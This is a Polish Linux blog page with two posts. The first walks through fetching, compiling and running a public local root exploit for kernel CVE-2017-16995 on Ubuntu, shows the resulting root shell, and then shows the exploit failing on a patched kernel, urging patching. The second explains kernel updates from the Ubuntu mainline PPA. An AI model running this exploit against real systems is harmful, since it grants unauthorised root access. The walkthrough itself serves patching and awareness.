Linux – RSNET.PL

Exploit na jądro Linux – podniesienie uprawnień do roota

admin — Wed, 27 Dec 2017 19:23:57 +0000

Pod poniższym linkiem można znaleźć gotowy exploit wykorzystujący podatność CVE-2017-16995

https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

Podatność CVE-2017-16995 została opisana dla systemu Debian pod podanym adresem:

https://security-tracker.debian.org/tracker/CVE-2017-16995

Błąd dotyczy wersji jądra >= 4.9. Listę podatnych jądr można znaleźć pod tym linkiem:

https://www.securityfocus.com/bid/102288

Więcej informacji o podatności można znaleźć tutaj:

http://seclists.org/oss-sec/2017/q4/429

EXPLOIT

Jak wykorzystać exploita, pokaże na przykładzie systemu operacyjnego Ubuntu z jądrem w wersji 4.10.0-041000-generic

Najpierw ściągnijmy kod exploita:

kuba@Ubuntu-1:~$ wget https://raw.githubusercontent.com/brl/grlh/master/get-rekt-linux-hardened.c
--2017-12-28 13:03:10-- https://raw.githubusercontent.com/brl/grlh/master/get-rekt-linux-hardened.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11540 (11K) [text/plain]
Saving to: ‘get-rekt-linux-hardened.c’

get-rekt-linux-hard 100%[===================>] 11.27K --.-KB/s in 0.002s

2017-12-28 13:03:10 (7.06 MB/s) - ‘get-rekt-linux-hardened.c’ saved [11540/11540]

kuba@Ubuntu-1:~$ ls -l
total 148
-rw-rw-r-- 1 kuba kuba 150547 Dec 28 12:55 get-rekt-linux-hardened.c

Jak widać mój użytkownik to kuba, sprawdźmy wynik komendy id dla tego użytkownika:

kuba@Ubuntu-1:~$ id
uid=1000(kuba) gid=1000(kuba) groups=1000(kuba)

Widzimy, że użytkownik nie jest rootem, możemy więc spróbować uruchomić exploit i zdobyć uprawnienia roota.

URUCHOMIENIE EXPLOITA

Exploita musimy skompilować, a następnie uruchomić. Do kompilowania użyjemy kompilatora gcc dostępnego w systemie:

kuba@Ubuntu-1:~$ gcc -o get-rekt-linux-hardened.o get-rekt-linux-hardened.c
get-rekt-linux-hardened.c: In function ‘writemsg’:
get-rekt-linux-hardened.c:334:19: warning: format ‘%d’ expects argument of type ‘int’, but argument 3 has type ‘ssize_t {aka long int}’ [-Wformat=]
 fprintf(stderr, "short write: %d\n", n);
 ^
kuba@Ubuntu-1:~$

Przy kompilacji dostaliśmy ostrzeżenie, jednak nie musimy się nim przejmować, kod został skompilowany i w wyniku działania powyższej komendy otrzymaliśmy plik: get-rekt-linux-hardened.o

Teraz pozostało tylko uruchomienie pliku:

kuba@Ubuntu-1:~$ ./get-rekt-linux-hardened.o
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] Leaking sock struct from ffff9a4db123d800
[*] found sock->sk_rcvtimeo at offset 592
[*] found sock->sk_peer_cred
[*] hammering cred structure at ffff9a4db78f46c0
[*] credentials patched, launching shell...
#

Udało się !. Znak # sugeruje że jesteśmy teraz w shellu roota, sprawdźmy to wykonując komendę id:

# id
uid=0(root) gid=0(root) groups=0(root)

PODSUMOWANIE

Jest to świeży BUG (został upubliczniony 21.12.2017). W momencie pisania tego artykułu istnieje załatane jądro do Ubuntu w wersji 4.15-rc5. Jak zaktualizować jądro pokazywałem we wpisie: https://kubsoo.github.io/rsnet-website/ubuntu-aktualizacja-jadra-na-szybko/

Sprawdźmy jak zachowa się ten sam exploit na zaktualizowanym jądrze:

kuba@Ubuntu-1:~$ uname -a
Linux Ubuntu-1 4.15.0-041500rc5-generic #201712240530 SMP Sun Dec 24 05:31:14 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

kuba@Ubuntu-1:~$ ./get-rekt-linux-hardened.o
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] log:
0: (b4) (u32) r2 = (u32) -1
1: (55) if r2 != 0xffffffff goto pc+2
 R1=ctx(id=0,off=0,imm=0) R2=inv-1 R10=fp0
2: (b7) r0 = 0
3: (95) exit

from 1 to 4: R1=ctx(id=0,off=0,imm=0) R2=inv4294967295 R10=fp0
4: (7b) *(u64 *)(r10 -16) = r1
5: (18) r9 = 0x0
7: (bf) r1 = r9
8: (bf) r2 = r10
9: (07) r2 += -4
10: (62) *(u32 *)(r10 -4) = 0
11: (85) call bpf_map_lookup_elem#1
12: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
13: (95) exit

from 12 to 14: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
14: (79) r6 = *(u64 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
15: (bf) r1 = r9
16: (bf) r2 = r10
17: (07) r2 += -4
18: (62) *(u32 *)(r10 -4) = 1
19: (85) call bpf_map_lookup_elem#1
20: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R6=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
21: (95) exit

from 20 to 22: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
22: (79) r7 = *(u64 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
23: (bf) r1 = r9
24: (bf) r2 = r10
25: (07) r2 += -4
26: (62) *(u32 *)(r10 -4) = 2
27: (85) call bpf_map_lookup_elem#1
28: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R6=inv(id=0) R7=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
29: (95) exit

from 28 to 30: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv(id=0) R7=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
30: (79) r8 = *(u64 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv(id=0) R7=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
31: (bf) r2 = r0
32: (b7) r0 = 0
33: (55) if r6 != 0x0 goto pc+2
 R0=inv0 R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv0 R7=inv(id=0) R8=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
34: (7b) *(u64 *)(r2 +0) = r10
R10 leaks addr into map
[!] failed to load prog 'Permission denied'

Jak widać jądro w wersji 4.15.0-041500rc5-generic jest odporne na tego exploita, więc zachęcam do szybkiego patchowania.

Ubuntu aktualizacja jądra – na szybko

admin — Wed, 13 Dec 2017 21:35:33 +0000

Przed przystąpieniem do aktualizacji jądra sprawdźmy jaką wersję jądra posiadamy, służy do tego komenda uname -a:

kuba@Ubuntu-1:~$ uname -a
Linux Ubuntu-1 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Wersja jądra to 4.4.0-104-generic

W celu aktualizacji jądra w systemie Ubuntu wchodzimy na stronę: http://kernel.ubuntu.com/~kernel-ppa/mainline/

wybieramy wersję jądra (ja wybrałem wersję v4.10). Po kliknięciu w odpowiednią wersję zostaniemy przekierowani na stronę:

http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.10/

gdzie mamy pliki dla odpowiednich platform sprzętowych. Ja posiadam procesor z architekturą 64 bitową, więc szukam plików dla tej architektury:

Build for amd64 succeeded (see BUILD.LOG.amd64):
  linux-headers-4.10.0-041000_4.10.0-041000.201702191831_all.deb
  linux-headers-4.10.0-041000-generic_4.10.0-041000.201702191831_amd64.deb
  linux-headers-4.10.0-041000-lowlatency_4.10.0-041000.201702191831_amd64.deb
  linux-image-4.10.0-041000-generic_4.10.0-041000.201702191831_amd64.deb
  linux-image-4.10.0-041000-lowlatency_4.10.0-041000.201702191831_amd64.deb

Nas interesują tylko poniższe trzy pliki:

linux-image-4.10.0-041000-generic_4.10.0-041000.201702191831_amd64.deb

linux-headers-4.10.0-041000_4.10.0-041000.201702191831_all.deb

linux-image-4.10.0-041000-generic_4.10.0-041000.201702191831_amd64.deb

Powyższe pliki ściągamy na nasz komputer korzystając z komendy wget:

wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.10/linux-headers-4.10.0-041000_4.10.0-041000.201702191831_all.deb
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.10/linux-headers-4.10.0-041000-generic_4.10.0-041000.201702191831_amd64.deb
wget http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.10/linux-image-4.10.0-041000-generic_4.10.0-041000.201702191831_amd64.deb

Jak mamy wszystkie 3 pliki ściągnięte:

kuba@Ubuntu-1:~$ ls
linux-headers-4.10.0-041000-generic_4.10.0-041000.201702191831_amd64.deb
linux-headers-4.10.0-041000_4.10.0-041000.201702191831_all.deb
linux-image-4.10.0-041000-generic_4.10.0-041000.201702191831_amd64.deb

to przechodzimy do ich instalacji. W tym celu wykonujemy poniższą komendę:

kuba@Ubuntu-1:~$ sudo dpkg-i *.deb

Jeśli wszystko przebiegło poprawnie i nie dostaliśmy żadnego błędu, możemy zrestartować urządzenie. Po restarcie system powinien wystartować z nowym zaktualizowanym jądrem.

root@Ubuntu-1:~# reboot

Po restarcie sprawdźmy wersję jądra:

kuba@Ubuntu-1:~$ uname -a
Linux Ubuntu-1 4.10.0-041000-generic #201702191831 SMP Sun Feb 19 23:33:19 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Widzimy, że aktualizacja przebiegła poprawnie i system korzysta z jądra w wersji 4.10.0-041000-generic.

AUTOMATYZACJA

Skrypt to automatycznej aktualizacji jądra dla systemów Ubuntu i Debian można znaleźć pod poniższym linkiem:

https://gist.github.com/kubsoo/36b16278ece326dacc487bc68140a4be

Jest to skrypt Python, który działa następująco:

sprawdza architekturę systemu i obecnie zainstalowaną wersje systemu
sprawdza na stronie: http://kernel.ubuntu.com/~kernel-ppa/mainline jaka jest najnowsza wersja systemu
porównuje tą wersję z zainstalowaną wersją i jeśli się różnią to ściąga odpowiednie pliki dla najnowszej wersji
instaluje najnowszą wersję systemu
restartuje system

Wynik działania skryptu wygląda następująco:

root@ubuntu-2:/home/kuba# ./update_kernel.py
System Architecture is amd64
Kernel version is 4.13.0-21-generic
Found new kernel version 4.15.0-041500rc6
Proceed with download Y/n: Y
--2018-01-07 21:21:15-- http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.15-rc6/linux-headers-4.15.0-041500rc6_4.15.0-041500rc6.201712312330_all.deb
Translacja kernel.ubuntu.com (kernel.ubuntu.com)... 91.189.94.216
Łączenie się z kernel.ubuntu.com (kernel.ubuntu.com)|91.189.94.216|:80... połączono.
Żądanie HTTP wysłano, oczekiwanie na odpowiedź... 200 OK
Długość: 10864312 (10M) [application/x-debian-package]
Zapis do: `linux-headers-4.15.0-041500rc6_4.15.0-041500rc6.201712312330_all.deb.1'

linux-headers-4.15. 100%[===================>] 10,36M 5,85MB/s w 1,8s

2018-01-07 21:21:17 (5,85 MB/s) - zapisano `linux-headers-4.15.0-041500rc6_4.15.0-041500rc6.201712312330_all.deb.1' [10864312/10864312]

--2018-01-07 21:21:17-- http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.15-rc6/linux-headers-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330_amd64.deb
Translacja kernel.ubuntu.com (kernel.ubuntu.com)... 91.189.94.216
Łączenie się z kernel.ubuntu.com (kernel.ubuntu.com)|91.189.94.216|:80... połączono.
Żądanie HTTP wysłano, oczekiwanie na odpowiedź... 200 OK
Długość: 1049628 (1,0M) [application/x-debian-package]
Zapis do: `linux-headers-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330_amd64.deb.1'

linux-headers-4.15. 100%[===================>] 1,00M 2,64MB/s w 0,4s

2018-01-07 21:21:18 (2,64 MB/s) - zapisano `linux-headers-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330_amd64.deb.1' [1049628/1049628]

--2018-01-07 21:21:18-- http://kernel.ubuntu.com/~kernel-ppa/mainline/v4.15-rc6/linux-image-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330_amd64.deb
Translacja kernel.ubuntu.com (kernel.ubuntu.com)... 91.189.94.216
Łączenie się z kernel.ubuntu.com (kernel.ubuntu.com)|91.189.94.216|:80... połączono.
Żądanie HTTP wysłano, oczekiwanie na odpowiedź... 200 OK
Długość: 52230452 (50M) [application/x-debian-package]
Zapis do: `linux-image-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330_amd64.deb.1'

linux-image-4.15.0- 100%[===================>] 49,81M 6,34MB/s w 7,9s

2018-01-07 21:21:26 (6,27 MB/s) - zapisano `linux-image-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330_amd64.deb.1' [52230452/52230452]

Kernel packages downloaded successfully!!!

Proceed with install Y/n: Y
Wybieranie wcześniej niewybranego pakietu linux-headers-4.15.0-041500rc6-generic.
(Odczytywanie bazy danych ... 69135 plików i katalogów obecnie zainstalowanych.)
Przygotowywanie do rozpakowania pakietu linux-headers-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330_amd64.deb ...
Rozpakowywanie pakietu linux-headers-4.15.0-041500rc6-generic (4.15.0-041500rc6.201712312330) ...
Wybieranie wcześniej niewybranego pakietu linux-headers-4.15.0-041500rc6.
Przygotowywanie do rozpakowania pakietu linux-headers-4.15.0-041500rc6_4.15.0-041500rc6.201712312330_all.deb ...
Rozpakowywanie pakietu linux-headers-4.15.0-041500rc6 (4.15.0-041500rc6.201712312330) ...
Wybieranie wcześniej niewybranego pakietu linux-image-4.15.0-041500rc6-generic.
Przygotowywanie do rozpakowania pakietu linux-image-4.15.0-041500rc6-generic_4.15.0-041500rc6.201712312330_amd64.deb ...
Done.
Rozpakowywanie pakietu linux-image-4.15.0-041500rc6-generic (4.15.0-041500rc6.201712312330) ...
Konfigurowanie pakietu linux-headers-4.15.0-041500rc6 (4.15.0-041500rc6.201712312330) ...
Konfigurowanie pakietu linux-image-4.15.0-041500rc6-generic (4.15.0-041500rc6.201712312330) ...
Running depmod.
update-initramfs: deferring update (hook will be called later)
Examining /etc/kernel/postinst.d.
run-parts: executing /etc/kernel/postinst.d/apt-auto-removal 4.15.0-041500rc6-generic /boot/vmlinuz-4.15.0-041500rc6-generic
run-parts: executing /etc/kernel/postinst.d/initramfs-tools 4.15.0-041500rc6-generic /boot/vmlinuz-4.15.0-041500rc6-generic
update-initramfs: Generating /boot/initrd.img-4.15.0-041500rc6-generic
run-parts: executing /etc/kernel/postinst.d/zz-update-grub 4.15.0-041500rc6-generic /boot/vmlinuz-4.15.0-041500rc6-generic
Generowanie pliku konfiguracyjnego GRUB-a...
Uwaga: Ustawienie GRUB_TIMEOUT na wartość niezerową przy ustawionym GRUB_HIDDEN_TIMEOUT nie jest już obsługiwane.
Znaleziono obraz Linuksa: /boot/vmlinuz-4.15.0-041500rc6-generic
Znaleziono obraz initrd: /boot/initrd.img-4.15.0-041500rc6-generic
Znaleziono obraz Linuksa: /boot/vmlinuz-4.13.0-21-generic
Znaleziono obraz initrd: /boot/initrd.img-4.13.0-21-generic
gotowe
Konfigurowanie pakietu linux-headers-4.15.0-041500rc6-generic (4.15.0-041500rc6.201712312330) ...
Installation successfull

Proceed with reboot Y/n: Y